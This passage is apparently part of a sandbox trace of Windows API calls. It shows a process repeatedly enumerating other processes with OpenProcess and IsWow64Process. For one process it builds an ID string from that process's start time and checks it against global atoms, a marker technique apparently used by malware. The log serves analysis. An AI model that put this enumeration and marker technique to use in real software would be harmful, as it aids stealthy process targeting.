	[0111.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.170] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.170] CloseHandle (hObject=0x694) returned 1
	[0111.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.170] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.170] CloseHandle (hObject=0x694) returned 1
	[0111.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.171] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.171] CloseHandle (hObject=0x694) returned 1
	[0111.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.171] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.171] CloseHandle (hObject=0x694) returned 1
	[0111.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.171] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.171] CloseHandle (hObject=0x694) returned 1
	[0111.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.171] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.171] CloseHandle (hObject=0x694) returned 1
	[0111.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.172] CloseHandle (hObject=0x694) returned 1
	[0111.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.172] CloseHandle (hObject=0x694) returned 1
	[0111.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.172] CloseHandle (hObject=0x694) returned 1
	[0111.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.172] CloseHandle (hObject=0x694) returned 1
	[0111.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.172] CloseHandle (hObject=0x694) returned 1
	[0111.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.173] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.173] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.173] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.175] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.175] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.176] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.176] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.176] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.176] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.176] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.176] CloseHandle (hObject=0x694) returned 1
	[0111.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.177] CloseHandle (hObject=0x694) returned 1
	[0111.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.177] CloseHandle (hObject=0x694) returned 1
	[0111.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.177] CloseHandle (hObject=0x694) returned 1
	[0111.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.231] CloseHandle (hObject=0x694) returned 1
	[0111.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.232] CloseHandle (hObject=0x694) returned 1
	[0111.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.232] CloseHandle (hObject=0x694) returned 1
	[0111.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.232] CloseHandle (hObject=0x694) returned 1
	[0111.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.232] CloseHandle (hObject=0x694) returned 1
	[0111.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.233] CloseHandle (hObject=0x694) returned 1
	[0111.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.233] CloseHandle (hObject=0x694) returned 1
	[0111.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.233] CloseHandle (hObject=0x694) returned 1
	[0111.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.233] CloseHandle (hObject=0x694) returned 1
	[0111.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.234] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.234] CloseHandle (hObject=0x694) returned 1
	[0111.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.234] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.234] CloseHandle (hObject=0x694) returned 1
	[0111.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.234] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.234] CloseHandle (hObject=0x694) returned 1
	[0111.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.234] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.234] CloseHandle (hObject=0x694) returned 1
	[0111.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.235] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.235] CloseHandle (hObject=0x694) returned 1
	[0111.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.235] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.235] CloseHandle (hObject=0x694) returned 1
	[0111.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.235] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.235] CloseHandle (hObject=0x694) returned 1
	[0111.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.235] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.235] CloseHandle (hObject=0x694) returned 1
	[0111.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.235] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.235] CloseHandle (hObject=0x694) returned 1
	[0111.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.236] CloseHandle (hObject=0x694) returned 1
	[0111.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.236] CloseHandle (hObject=0x694) returned 1
	[0111.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.236] CloseHandle (hObject=0x694) returned 1
	[0111.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.236] CloseHandle (hObject=0x694) returned 1
	[0111.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.237] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.237] CloseHandle (hObject=0x694) returned 1
	[0111.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.237] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.237] CloseHandle (hObject=0x694) returned 1
	[0111.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.237] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.237] CloseHandle (hObject=0x694) returned 1
	[0111.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.237] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.237] CloseHandle (hObject=0x694) returned 1
	[0111.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.237] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.237] CloseHandle (hObject=0x694) returned 1
	[0111.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.238] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.238] CloseHandle (hObject=0x694) returned 1
	[0111.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.238] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.238] CloseHandle (hObject=0x694) returned 1
	[0111.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.239] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.239] CloseHandle (hObject=0x694) returned 1
	[0111.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.239] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.239] CloseHandle (hObject=0x694) returned 1
	[0111.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.240] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.243] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.243] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.243] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.243] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.244] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.244] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.244] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.244] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.244] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.244] CloseHandle (hObject=0x694) returned 1
	[0111.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.245] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.245] CloseHandle (hObject=0x694) returned 1
	[0111.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.245] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.245] CloseHandle (hObject=0x694) returned 1
	[0111.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.245] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.245] CloseHandle (hObject=0x694) returned 1
	[0111.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.296] CloseHandle (hObject=0x694) returned 1
	[0111.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.296] CloseHandle (hObject=0x694) returned 1
	[0111.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.297] CloseHandle (hObject=0x694) returned 1
	[0111.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.297] CloseHandle (hObject=0x694) returned 1
	[0111.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.297] CloseHandle (hObject=0x694) returned 1
	[0111.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.298] CloseHandle (hObject=0x694) returned 1
	[0111.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.298] CloseHandle (hObject=0x694) returned 1
	[0111.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.298] CloseHandle (hObject=0x694) returned 1
	[0111.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.298] CloseHandle (hObject=0x694) returned 1
	[0111.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.299] CloseHandle (hObject=0x694) returned 1
	[0111.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.299] CloseHandle (hObject=0x694) returned 1
	[0111.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.299] CloseHandle (hObject=0x694) returned 1
	[0111.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.299] CloseHandle (hObject=0x694) returned 1
	[0111.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.299] CloseHandle (hObject=0x694) returned 1
	[0111.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.300] CloseHandle (hObject=0x694) returned 1
	[0111.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.300] CloseHandle (hObject=0x694) returned 1
	[0111.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.300] CloseHandle (hObject=0x694) returned 1
	[0111.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.300] CloseHandle (hObject=0x694) returned 1
	[0111.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.301] CloseHandle (hObject=0x694) returned 1
	[0111.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.301] CloseHandle (hObject=0x694) returned 1
	[0111.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.301] CloseHandle (hObject=0x694) returned 1
	[0111.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.301] CloseHandle (hObject=0x694) returned 1
	[0111.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.301] CloseHandle (hObject=0x694) returned 1
	[0111.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.302] CloseHandle (hObject=0x694) returned 1
	[0111.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.302] CloseHandle (hObject=0x694) returned 1
	[0111.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.302] CloseHandle (hObject=0x694) returned 1
	[0111.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.302] CloseHandle (hObject=0x694) returned 1
	[0111.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
